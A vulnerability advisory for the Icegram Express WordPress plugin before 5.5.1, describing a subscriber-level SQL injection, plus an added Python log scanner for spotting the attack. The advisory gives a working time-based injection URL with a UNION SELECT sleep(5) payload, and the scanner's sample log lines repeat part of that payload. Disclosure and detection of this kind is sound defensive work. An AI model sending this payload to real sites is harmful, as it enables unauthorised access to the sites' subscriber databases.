wpexploit | Krzysztof Zajac | WPEX-ID:78054D08-0227-426C-903D-D146E0919028
History: Nov 21, 2022 - 12:00 a.m.

Icegram Express < 5.5.1 - Subscriber+ SQLi

2022-11-21 00:00:00
Krzysztof Zajac
165
icegram express
sql injection
subscriber+
security exploit

EPSS: 0.001 (Low), percentile 33.6%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated user, such as a subscriber.

Open the URL below while logged in as a subscriber and notice the 5s delay:

https://example.com/wp-admin/admin-ajax.php?action=count_contacts_by_list&get_count=yes&list_id=1&conditions[]=3&status[]=\&status[]=)%20%20UNION%20SELECT%20sleep(5)%20UNION%20SELECT%20COUNT(DISTINCT%20subscribers.id)%20FROM%20wp_ig_contacts%20AS%20subscribers%20LEFT%20JOIN%20wp_ig_lists_contacts%20AS%20lists_subscribers%20ON%20subscribers.id%20=%20lists_subscribers.contact_id%20WHERE%201=1%20AND%20lists_subscribers.status%20IN(1)%20--%20g
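A log check for the request shape shown above, for sites still confirming they run 5.5.1 or later. This is an added example, not code from the advisory or the plugin; the combined log format, the sample lines and the assumption that legitimate `list_id`, `conditions[]` and `status[]` values are plain alphanumeric tokens are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = r'''
198.51.100.7 - - [21/Nov/2022:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=count_contacts_by_list&get_count=yes&list_id=1&conditions[]=3&status[]=subscribed HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Nov/2022:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=count_contacts_by_list&get_count=yes&list_id=1&conditions[]=3&status[]=\&status[]=)%20%20UNION%20SELECT%20sleep(5)%20--%20g HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Nov/2022:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&note=a%20(b) HTTP/1.1" 200 5 "-" "Mozilla/5.0"
'''

# Client address and request target from one log line.
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: benign values for the watched parameters are simple tokens.
SAFE_VALUE = re.compile(r'^[A-Za-z0-9_-]*$')
WATCHED = {"list_id", "conditions[]", "status[]"}


def suspicious_requests(log_text):
    """Return (client, [(param, decoded_value), ...]) for each request to the
    count_contacts_by_list AJAX action whose watched parameters carry
    characters outside the safe token set (backslash, quotes, parentheses,
    whitespace, comment markers)."""
    hits = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qsl percent-decodes, so \ and %5C are treated alike.
        params = parse_qsl(url.query, keep_blank_values=True)
        if ("action", "count_contacts_by_list") not in params:
            continue
        bad = [(k, v) for k, v in params
               if k in WATCHED and not SAFE_VALUE.match(v)]
        if bad:
            hits.append((client, bad))
    return hits


if __name__ == "__main__":
    for client, bad in suspicious_requests(SAMPLE_LOG):
        print(client, bad)
```

Only the query string is inspected; parameters sent in a POST body do not appear in access logs and need a WAF or application-level log instead.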
